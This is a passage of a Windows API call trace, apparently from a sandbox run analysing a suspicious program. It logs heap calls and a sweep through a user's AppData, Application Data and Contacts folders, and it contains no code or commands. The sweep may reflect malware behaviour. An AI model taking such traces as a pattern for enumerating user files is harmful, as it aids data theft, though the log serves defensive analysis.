lpMem=0x2ad7bd0 | out: hHeap=0x2c0000) returned 1 [0180.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0180.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b80 | out: hHeap=0x2c0000) returned 1 [0180.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b58 | out: hHeap=0x2c0000) returned 1 [0180.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0180.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b08 | out: hHeap=0x2c0000) returned 1 [0180.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ae0 | out: hHeap=0x2c0000) returned 1 [0180.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ab8 | out: hHeap=0x2c0000) returned 1 [0180.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7888 | out: hHeap=0x2c0000) returned 1 [0180.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0180.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0180.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0180.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7978 | out: hHeap=0x2c0000) returned 1 [0180.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7dd8 | out: hHeap=0x2c0000) returned 1 [0180.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0180.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e28 | out: hHeap=0x2c0000) returned 1 [0180.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0180.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0180.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0180.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfeb8 | out: hHeap=0x2c0000) returned 1 [0180.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfef0 | out: hHeap=0x2c0000) returned 1 [0180.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adff28 | out: hHeap=0x2c0000) returned 1 [0180.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adff60 | out: hHeap=0x2c0000) returned 1 [0180.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0180.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0180.711] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.729] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0180.729] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.729] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.729] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.729] PathFindFileNameW (pszPath="") returned="" [0180.729] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.730] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.730] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa7872780, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xa7872780, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0180.730] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0180.730] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0180.731] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0180.731] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0180.731] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.731] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0180.731] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.731] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.732] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.732] PathFindFileNameW (pszPath="") returned="" [0180.732] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0180.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0180.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0180.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40370 | out: hHeap=0x2c0000) returned 1 [0180.732] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0180.732] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.733] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0180.733] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.733] PathFindFileNameW (pszPath="") returned="" [0180.733] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0180.733] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.733] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0180.733] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.733] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0180.733] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 